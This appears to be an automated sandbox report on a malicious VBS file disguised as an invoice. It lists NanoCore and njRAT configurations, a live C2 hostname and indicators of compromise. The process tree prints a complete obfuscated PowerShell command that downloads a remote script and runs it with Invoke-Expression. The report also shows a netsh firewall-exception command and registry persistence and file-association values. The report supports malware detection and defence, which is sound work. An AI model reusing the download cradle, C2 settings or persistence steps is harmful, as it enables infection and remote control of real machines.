Y1K3875FX_INV0ICE_RECEIPT.vbs

General
Target

Y1K3875FX_INV0ICE_RECEIPT.vbs

Filesize

4KB

Completed

14-01-2022 16:30

Score
10/10
MD5

eabf87aa6e88a700b48fdc11fd56d034

SHA1

02aa868a130881a5dc409a7d06d943f7ae7f0654

SHA256

a52cb2c09e66deb221d1db56e62b67138e5e3de516966481f789cd48dcacbe66

Malware Config

Extracted

Family nanocore
Version 1.2.2.0
C2

childhome4100.duckdns.org:4100

Attributes
activate_away_mode
true
backup_connection_host
childhome4100.duckdns.org
backup_dns_server
8.8.4.4
buffer_size
65535
build_time
2021-10-26T14:02:15.903896736Z
bypass_user_account_control
true
bypass_user_account_control_data
clear_access_control
true
clear_zone_identifier
false
connect_delay
4000
connection_port
4100
default_group
father of child
enable_debug_mode
true
gc_threshold
1.048576e+07
keep_alive_timeout
30000
keyboard_logging
false
lan_timeout
2500
max_packet_size
1.048576e+07
mutex
915339bc-81e8-473d-98ef-3cba5bb4ebc8
mutex_timeout
5000
prevent_system_sleep
false
primary_connection_host
childhome4100.duckdns.org
primary_dns_server
8.8.8.8
request_elevation
true
restart_delay
5000
run_delay
0
run_on_startup
true
set_critical_process
true
timeout_interval
5000
use_custom_dns_server
false
version
1.2.2.0
wan_timeout
8000

Extracted

Family njrat
Version 1.9
Botnet HacKed
Attributes
reg_key
Microsoft.Exe
Signatures 19

Filter: none

Defense Evasion
Discovery
Persistence
  • Detect Neshta Payload

    Reported IOCs

    resourceyara_rule
    behavioral2/memory/3864-144-0x00000000004080E4-mapping.dmpfamily_neshta
    behavioral2/memory/3864-143-0x0000000000400000-0x000000000041B000-memory.dmpfamily_neshta
    behavioral2/memory/3864-148-0x0000000000400000-0x000000000041B000-memory.dmpfamily_neshta
  • Modifies system executable filetype association
    aspnet_compiler.exe

    TTPs

    Modify RegistryChange Default File Association

    Reported IOCs

    descriptioniocprocess
    Set value (str)\REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\open\command\ = "C:\\Windows\\svchost.com \"%1\" %*"aspnet_compiler.exe
  • NanoCore

    Description

    NanoCore is a remote access tool (RAT) with a variety of capabilities.

  • Neshta

    Description

    Malware from the neshta family is designed to infect itself into other files to spread itself and cause damage.

  • njRAT/Bladabindi

    Description

    Widely used RAT written in .NET.

  • Blocklisted process makes network request
    powershell.exe

    Reported IOCs

    flowpidprocess
    20536powershell.exe
    39536powershell.exe
  • Modifies Windows Firewall

    Tags

    TTPs

    Modify Existing Service
  • Checks computer location settings
    WScript.exe

    Description

    Looks up country code configured in the registry, likely geofence.

    TTPs

    Query RegistrySystem Information Discovery

    Reported IOCs

    descriptioniocprocess
    Key value queried\REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\Control Panel\International\Geo\NationWScript.exe
  • Adds Run key to start application
    aspnet_compiler.exe

    TTPs

    Registry Run Keys / Startup FolderModify Registry

    Reported IOCs

    descriptioniocprocess
    Set value (str)\REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Microsoft.Exe = "\"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\aspnet_compiler.exe\" .."aspnet_compiler.exe
    Set value (str)\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Microsoft.Exe = "\"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\aspnet_compiler.exe\" .."aspnet_compiler.exe
  • Suspicious use of SetThreadContext
    powershell.exe

    Reported IOCs

    descriptionpidprocesstarget process
    PID 536 set thread context of 3812536powershell.exeaspnet_compiler.exe
    PID 536 set thread context of 3864536powershell.exeaspnet_compiler.exe
    PID 536 set thread context of 3304536powershell.exeaspnet_compiler.exe
  • Drops file in Program Files directory
    aspnet_compiler.exe

    Reported IOCs

    descriptioniocprocess
    File opened for modificationC:\PROGRA~2\MICROS~1\Edge\APPLIC~1\920902~1.67\NOTIFI~1.EXEaspnet_compiler.exe
    File opened for modificationC:\PROGRA~2\WINDOW~2\wab.exeaspnet_compiler.exe
    File opened for modificationC:\PROGRA~3\Adobe\Setup\{AC76B~1\setup.exeaspnet_compiler.exe
    File opened for modificationC:\PROGRA~3\PACKAG~1\{EF6B0~1\VCREDI~1.EXEaspnet_compiler.exe
    File opened for modificationC:\PROGRA~2\WINDOW~4\wmpshare.exeaspnet_compiler.exe
    File opened for modificationC:\PROGRA~3\MICROS~1\CLICKT~1\{9AC08~1\INTEGR~1.EXEaspnet_compiler.exe
    File opened for modificationC:\PROGRA~3\PACKAG~1\{4D8DC~1\VC_RED~1.EXEaspnet_compiler.exe
    File opened for modificationC:\PROGRA~2\Adobe\ACROBA~1\Reader\ACROTE~1.EXEaspnet_compiler.exe
    File opened for modificationC:\PROGRA~2\Adobe\ACROBA~1\Reader\plug_ins\PI_BRO~1\64BITM~1.EXEaspnet_compiler.exe
    File opened for modificationC:\PROGRA~2\COMMON~1\MICROS~1\VSTO\10.0\VSTOIN~1.EXEaspnet_compiler.exe
    File opened for modificationC:\PROGRA~2\MICROS~1\Edge\APPLIC~1\920902~1.67\COOKIE~1.EXEaspnet_compiler.exe
    File opened for modificationC:\PROGRA~2\MICROS~1\Edge\APPLIC~1\920902~1.67\MSEDGE~1.EXEaspnet_compiler.exe
    File opened for modificationC:\PROGRA~3\PACKAG~1\{CA675~1\VCREDI~1.EXEaspnet_compiler.exe
    File opened for modificationC:\PROGRA~2\Google\Update\1336~1.71\GOOGLE~1.EXEaspnet_compiler.exe
    File opened for modificationC:\PROGRA~2\Google\Update\1336~1.71\GOF5E2~1.EXEaspnet_compiler.exe
    File opened for modificationC:\PROGRA~2\MICROS~1\EDGEUP~1\MicrosoftEdgeUpdate.exeaspnet_compiler.exe
    File opened for modificationC:\PROGRA~2\MOZILL~1\UNINST~1.EXEaspnet_compiler.exe
    File opened for modificationC:\PROGRA~2\WINDOW~4\setup_wm.exeaspnet_compiler.exe
    File opened for modificationC:\PROGRA~2\Adobe\ACROBA~1\Reader\ADelRCP.exeaspnet_compiler.exe
    File opened for modificationC:\PROGRA~2\Adobe\ACROBA~1\Reader\READER~1.EXEaspnet_compiler.exe
    File opened for modificationC:\PROGRA~2\COMMON~1\Adobe\ARM\1.0\ADOBEA~1.EXEaspnet_compiler.exe
    File opened for modificationC:\PROGRA~2\MICROS~1\EDGEUP~1\13153~1.55\MICROS~4.EXEaspnet_compiler.exe
    File opened for modificationC:\PROGRA~2\WINDOW~2\wabmig.exeaspnet_compiler.exe
    File opened for modificationC:\PROGRA~2\WINDOW~4\wmpconfig.exeaspnet_compiler.exe
    File opened for modificationC:\PROGRA~2\WI8A19~1\ImagingDevices.exeaspnet_compiler.exe
    File opened for modificationC:\PROGRA~2\MICROS~1\Edge\APPLIC~1\920902~1.67\IDENTI~1.EXEaspnet_compiler.exe
    File opened for modificationC:\PROGRA~2\WINDOW~3\ACCESS~1\wordpad.exeaspnet_compiler.exe
    File opened for modificationC:\PROGRA~2\MICROS~1\EDGEUP~1\Download\{F3C4F~1\13153~1.55\MICROS~1.EXEaspnet_compiler.exe
    File opened for modificationC:\PROGRA~2\Adobe\ACROBA~1\Reader\ACROBR~1.EXEaspnet_compiler.exe
    File opened for modificationC:\PROGRA~2\Adobe\ACROBA~1\Reader\plug_ins\PI_BRO~1\32BITM~1.EXEaspnet_compiler.exe
    File opened for modificationC:\PROGRA~2\MICROS~1\Edge\APPLIC~1\920902~1.67\PWAHEL~1.EXEaspnet_compiler.exe
    File opened for modificationC:\PROGRA~2\MICROS~1\EDGEUP~1\13153~1.55\MICROS~3.EXEaspnet_compiler.exe
    File opened for modificationC:\PROGRA~2\MICROS~1\EDGEUP~1\13153~1.55\MIA062~1.EXEaspnet_compiler.exe
    File opened for modificationC:\PROGRA~2\Adobe\ACROBA~1\Reader\AcroRd32.exeaspnet_compiler.exe
    File opened for modificationC:\PROGRA~2\Adobe\ACROBA~1\Reader\Eula.exeaspnet_compiler.exe
    File opened for modificationC:\PROGRA~2\COMMON~1\Adobe\ARM\1.0\armsvc.exeaspnet_compiler.exe
    File opened for modificationC:\PROGRA~2\MICROS~1\Edge\APPLIC~1\msedge.exeaspnet_compiler.exe
    File opened for modificationC:\PROGRA~2\INTERN~1\ieinstal.exeaspnet_compiler.exe
    File opened for modificationC:\PROGRA~2\MICROS~1\Edge\APPLIC~1\920902~1.67\ELEVAT~1.EXEaspnet_compiler.exe
    File opened for modificationC:\PROGRA~2\WINDOW~4\wmlaunch.exeaspnet_compiler.exe
    File opened for modificationC:\PROGRA~2\COMMON~1\Adobe\ARM\1.0\AdobeARM.exeaspnet_compiler.exe
    File opened for modificationC:\PROGRA~2\COMMON~1\Java\JAVAUP~1\jucheck.exeaspnet_compiler.exe
    File opened for modificationC:\PROGRA~2\Google\Update\1336~1.71\GO664E~1.EXEaspnet_compiler.exe
    File opened for modificationC:\PROGRA~2\Google\Update\1336~1.71\GOBD5D~1.EXEaspnet_compiler.exe
    File opened for modificationC:\PROGRA~2\MICROS~1\Edge\APPLIC~1\PWAHEL~1.EXEaspnet_compiler.exe
    File opened for modificationC:\PROGRA~2\MOZILL~1\MAINTE~1.EXEaspnet_compiler.exe
    File opened for modificationC:\PROGRA~2\WINDOW~4\wmplayer.exeaspnet_compiler.exe
    File opened for modificationC:\PROGRA~2\Adobe\ACROBA~1\Reader\Browser\WCCHRO~1\WCCHRO~1.EXEaspnet_compiler.exe
    File opened for modificationC:\PROGRA~2\Adobe\ACROBA~1\Reader\FULLTR~1.EXEaspnet_compiler.exe
    File opened for modificationC:\PROGRA~2\Google\Update\1336~1.71\GOOGLE~4.EXEaspnet_compiler.exe
    File opened for modificationC:\PROGRA~2\Google\Update\DISABL~1.EXEaspnet_compiler.exe
    File opened for modificationC:\PROGRA~2\MICROS~1\Edge\APPLIC~1\920902~1.67\MSEDGE~2.EXEaspnet_compiler.exe
    File opened for modificationC:\PROGRA~3\PACKAG~1\{33D1F~1\VCREDI~1.EXEaspnet_compiler.exe
    File opened for modificationC:\PROGRA~2\WINDOW~4\wmprph.exeaspnet_compiler.exe
    File opened for modificationC:\PROGRA~2\Adobe\ACROBA~1\Reader\ADOBEC~1.EXEaspnet_compiler.exe
    File opened for modificationC:\PROGRA~2\COMMON~1\MICROS~1\MSInfo\msinfo32.exeaspnet_compiler.exe
    File opened for modificationC:\PROGRA~2\INTERN~1\iexplore.exeaspnet_compiler.exe
    File opened for modificationC:\PROGRA~2\MICROS~1\Edge\APPLIC~1\920902~1.67\INSTAL~1\setup.exeaspnet_compiler.exe
    File opened for modificationC:\PROGRA~2\MICROS~1\Edge\APPLIC~1\MSEDGE~1.EXEaspnet_compiler.exe
    File opened for modificationC:\PROGRA~2\Google\Update\1336~1.71\GOOGLE~3.EXEaspnet_compiler.exe
    File opened for modificationC:\PROGRA~2\INTERN~1\ExtExport.exeaspnet_compiler.exe
    File opened for modificationC:\PROGRA~2\MICROS~1\Edge\APPLIC~1\920902~1.67\BHO\IE_TO_~1.EXEaspnet_compiler.exe
    File opened for modificationC:\PROGRA~2\MICROS~1\EDGEUP~1\13153~1.55\MI9C33~1.EXEaspnet_compiler.exe
    File opened for modificationC:\PROGRA~3\PACKAG~1\{57A73~1\VC_RED~1.EXEaspnet_compiler.exe
  • Drops file in Windows directory
    aspnet_compiler.exe

    Reported IOCs

    descriptioniocprocess
    File opened for modificationC:\Windows\svchost.comaspnet_compiler.exe
  • Enumerates physical storage devices

    Description

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

    TTPs

    System Information Discovery
  • Checks processor information in registry
    MusNotification.exe

    Description

    Processor information is often read in order to detect sandboxing environments.

    TTPs

    Query RegistrySystem Information Discovery

    Reported IOCs

    descriptioniocprocess
    Key opened\Registry\Machine\HARDWARE\DESCRIPTION\System\CentralProcessor\0MusNotification.exe
    Key value queried\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHzMusNotification.exe
  • Modifies registry class
    aspnet_compiler.exe

    Reported IOCs

    descriptioniocprocess
    Set value (str)\REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\open\command\ = "C:\\Windows\\svchost.com \"%1\" %*"aspnet_compiler.exe
  • Suspicious behavior: EnumeratesProcesses
    powershell.exeaspnet_compiler.exe

    Reported IOCs

    pidprocess
    536powershell.exe
    536powershell.exe
    536powershell.exe
    536powershell.exe
    536powershell.exe
    536powershell.exe
    3812aspnet_compiler.exe
    3812aspnet_compiler.exe
    3812aspnet_compiler.exe
    3812aspnet_compiler.exe
    3812aspnet_compiler.exe
    3812aspnet_compiler.exe
  • Suspicious behavior: GetForegroundWindowSpam
    aspnet_compiler.exe

    Reported IOCs

    pidprocess
    3812aspnet_compiler.exe
  • Suspicious use of AdjustPrivilegeToken
    powershell.exeMusNotification.exeaspnet_compiler.exeaspnet_compiler.exe

    Reported IOCs

    descriptionpidprocess
    Token: SeDebugPrivilege536powershell.exe
    Token: SeShutdownPrivilege2292MusNotification.exe
    Token: SeCreatePagefilePrivilege2292MusNotification.exe
    Token: SeDebugPrivilege3812aspnet_compiler.exe
    Token: SeDebugPrivilege3304aspnet_compiler.exe
    Token: 333304aspnet_compiler.exe
    Token: SeIncBasePriorityPrivilege3304aspnet_compiler.exe
    Token: 333304aspnet_compiler.exe
    Token: SeIncBasePriorityPrivilege3304aspnet_compiler.exe
    Token: 333304aspnet_compiler.exe
    Token: SeIncBasePriorityPrivilege3304aspnet_compiler.exe
    Token: 333304aspnet_compiler.exe
    Token: SeIncBasePriorityPrivilege3304aspnet_compiler.exe
    Token: 333304aspnet_compiler.exe
    Token: SeIncBasePriorityPrivilege3304aspnet_compiler.exe
  • Suspicious use of WriteProcessMemory
    WScript.exepowershell.exeaspnet_compiler.exe

    Reported IOCs

    descriptionpidprocesstarget process
    PID 3088 wrote to memory of 5363088WScript.exepowershell.exe
    PID 3088 wrote to memory of 5363088WScript.exepowershell.exe
    PID 536 wrote to memory of 3812536powershell.exeaspnet_compiler.exe
    PID 536 wrote to memory of 3812536powershell.exeaspnet_compiler.exe
    PID 536 wrote to memory of 3812536powershell.exeaspnet_compiler.exe
    PID 536 wrote to memory of 3812536powershell.exeaspnet_compiler.exe
    PID 536 wrote to memory of 3812536powershell.exeaspnet_compiler.exe
    PID 536 wrote to memory of 3812536powershell.exeaspnet_compiler.exe
    PID 536 wrote to memory of 3812536powershell.exeaspnet_compiler.exe
    PID 536 wrote to memory of 3812536powershell.exeaspnet_compiler.exe
    PID 536 wrote to memory of 4060536powershell.exeaspnet_compiler.exe
    PID 536 wrote to memory of 4060536powershell.exeaspnet_compiler.exe
    PID 536 wrote to memory of 4060536powershell.exeaspnet_compiler.exe
    PID 536 wrote to memory of 3864536powershell.exeaspnet_compiler.exe
    PID 536 wrote to memory of 3864536powershell.exeaspnet_compiler.exe
    PID 536 wrote to memory of 3864536powershell.exeaspnet_compiler.exe
    PID 536 wrote to memory of 3864536powershell.exeaspnet_compiler.exe
    PID 536 wrote to memory of 3864536powershell.exeaspnet_compiler.exe
    PID 536 wrote to memory of 3864536powershell.exeaspnet_compiler.exe
    PID 536 wrote to memory of 3864536powershell.exeaspnet_compiler.exe
    PID 536 wrote to memory of 3864536powershell.exeaspnet_compiler.exe
    PID 536 wrote to memory of 3864536powershell.exeaspnet_compiler.exe
    PID 536 wrote to memory of 3864536powershell.exeaspnet_compiler.exe
    PID 536 wrote to memory of 3864536powershell.exeaspnet_compiler.exe
    PID 536 wrote to memory of 3584536powershell.exeaspnet_compiler.exe
    PID 536 wrote to memory of 3584536powershell.exeaspnet_compiler.exe
    PID 536 wrote to memory of 3584536powershell.exeaspnet_compiler.exe
    PID 536 wrote to memory of 3304536powershell.exeaspnet_compiler.exe
    PID 536 wrote to memory of 3304536powershell.exeaspnet_compiler.exe
    PID 536 wrote to memory of 3304536powershell.exeaspnet_compiler.exe
    PID 536 wrote to memory of 3304536powershell.exeaspnet_compiler.exe
    PID 536 wrote to memory of 3304536powershell.exeaspnet_compiler.exe
    PID 536 wrote to memory of 3304536powershell.exeaspnet_compiler.exe
    PID 536 wrote to memory of 3304536powershell.exeaspnet_compiler.exe
    PID 536 wrote to memory of 3304536powershell.exeaspnet_compiler.exe
    PID 3304 wrote to memory of 32483304aspnet_compiler.exenetsh.exe
    PID 3304 wrote to memory of 32483304aspnet_compiler.exenetsh.exe
    PID 3304 wrote to memory of 32483304aspnet_compiler.exenetsh.exe
Processes 9
  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Y1K3875FX_INV0ICE_RECEIPT.vbs"
    Checks computer location settings
    Suspicious use of WriteProcessMemory
    PID:3088
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $Hx = 'HttP://swmen.com/vet/PS1NAIO.txt';$HB=('{2}{0}{1}' -f'---------l---------o---------a---------d---------'.RePlace('---------',''),'**********s**********t**********r**********i**********n**********g**********'.RePlace('**********',''),'sss+Dsss+osss+wsss+nsss+'.RePlace('sss+',''));$HBB=('{2}{0}{1}' -f'---------e---------B---------c---------l---------'.RePlace('---------',''),'---------i---------e---------n---------t---------'.RePlace('---------',''),'---------Ne---------t---------.W---------'.RePlace('---------',''));$HBBB=('{2}{0}{1}' -f'------w-o------B------j------e------c------t $------H------'.RePlace('------',''),'------BB------).$H------B(------$H------x)------'.RePlace('------',''),'------I------`e------`X(------Ne------'.RePlace('------',''));$HBBBBB = ($HBBB -Join '')|InVoke-exPressioN
      Blocklisted process makes network request
      Suspicious use of SetThreadContext
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:536
      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
        Suspicious behavior: EnumeratesProcesses
        Suspicious behavior: GetForegroundWindowSpam
        Suspicious use of AdjustPrivilegeToken
        PID:3812
      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
        PID:4060
      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
        Modifies system executable filetype association
        Drops file in Program Files directory
        Drops file in Windows directory
        Modifies registry class
        PID:3864
      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
        PID:3584
      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
        Adds Run key to start application
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        PID:3304
        • C:\Windows\SysWOW64\netsh.exe
          netsh firewall add allowedprogram "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe" "aspnet_compiler.exe" ENABLE
          PID:3248
  • C:\Windows\system32\MusNotification.exe
    C:\Windows\system32\MusNotification.exe
    Checks processor information in registry
    Suspicious use of AdjustPrivilegeToken
    PID:2292
Network
MITRE ATT&CK Matrix
Collection
    Command and Control
      Credential Access
        Defense Evasion
        Execution
          Exfiltration
            Impact
              Initial Access
                Lateral Movement
                  Privilege Escalation
                    Replay Monitor
                    00:00 00:00
                    Downloads
                    • C:\PROGRA~3\314694~1\MICROS~1.EXE

                      MD5

                      fda8c8f2a4e100afb14c13dfcbcab2d2

                      SHA1

                      19dfd86294c4a525ba21c6af77681b2a9bbecb55

                      SHA256

                      99a2c778c9a6486639d0aff1a7d2d494c2b0dc4c7913ebcb7bfea50a2f1d0b09

                      SHA512

                      94f0ace37cae77be9935cf4fc8aaa94691343d3b38de5e16c663b902c220bff513cd02256c7af2d815a23dd30439582ddbb0880009c76bbf36ff8fbc1a6ddc18

                    • memory/536-147-0x0000023AB3E30000-0x0000023AB3E32000-memory.dmp

                    • memory/536-131-0x0000023AB3E30000-0x0000023AB3E32000-memory.dmp

                    • memory/536-132-0x0000023AB3E30000-0x0000023AB3E32000-memory.dmp

                    • memory/536-133-0x0000023AB3E30000-0x0000023AB3E32000-memory.dmp

                    • memory/536-134-0x0000023AB3E30000-0x0000023AB3E32000-memory.dmp

                    • memory/536-136-0x0000023AB3E30000-0x0000023AB3E32000-memory.dmp

                    • memory/536-137-0x0000023AB3E30000-0x0000023AB3E32000-memory.dmp

                    • memory/536-138-0x0000023AB3F00000-0x0000023AB3F02000-memory.dmp

                    • memory/536-139-0x0000023AB3F03000-0x0000023AB3F05000-memory.dmp

                    • memory/536-140-0x0000023AB3F06000-0x0000023AB3F08000-memory.dmp

                    • memory/536-135-0x0000023AB5870000-0x0000023AB5892000-memory.dmp

                    • memory/536-130-0x0000000000000000-mapping.dmp

                    • memory/3248-161-0x0000000000000000-mapping.dmp

                    • memory/3304-164-0x00000000061E0000-0x0000000006246000-memory.dmp

                    • memory/3304-165-0x0000000005C20000-0x0000000005C2A000-memory.dmp

                    • memory/3304-146-0x000000000040BBCE-mapping.dmp

                    • memory/3304-145-0x0000000000400000-0x0000000000410000-memory.dmp

                    • memory/3304-158-0x0000000005680000-0x0000000005712000-memory.dmp

                    • memory/3304-155-0x0000000005C30000-0x00000000061D4000-memory.dmp

                    • memory/3304-150-0x0000000000400000-0x0000000000410000-memory.dmp

                    • memory/3304-154-0x00000000055E0000-0x000000000567C000-memory.dmp

                    • memory/3304-152-0x0000000000400000-0x0000000000410000-memory.dmp

                    • memory/3304-163-0x0000000005680000-0x0000000005C24000-memory.dmp

                    • memory/3812-151-0x0000000000400000-0x0000000000438000-memory.dmp

                    • memory/3812-149-0x0000000000400000-0x0000000000438000-memory.dmp

                    • memory/3812-156-0x0000000005610000-0x00000000056A2000-memory.dmp

                    • memory/3812-157-0x00000000056B0000-0x000000000574C000-memory.dmp

                    • memory/3812-141-0x0000000000400000-0x0000000000438000-memory.dmp

                    • memory/3812-159-0x0000000005570000-0x0000000005B14000-memory.dmp

                    • memory/3812-160-0x00000000055D0000-0x00000000055DA000-memory.dmp

                    • memory/3812-142-0x000000000041E792-mapping.dmp

                    • memory/3812-162-0x0000000006EC0000-0x0000000006F26000-memory.dmp

                    • memory/3812-153-0x0000000005B20000-0x00000000060C4000-memory.dmp

                    • memory/3864-144-0x00000000004080E4-mapping.dmp

                    • memory/3864-143-0x0000000000400000-0x000000000041B000-memory.dmp

                    • memory/3864-148-0x0000000000400000-0x000000000041B000-memory.dmp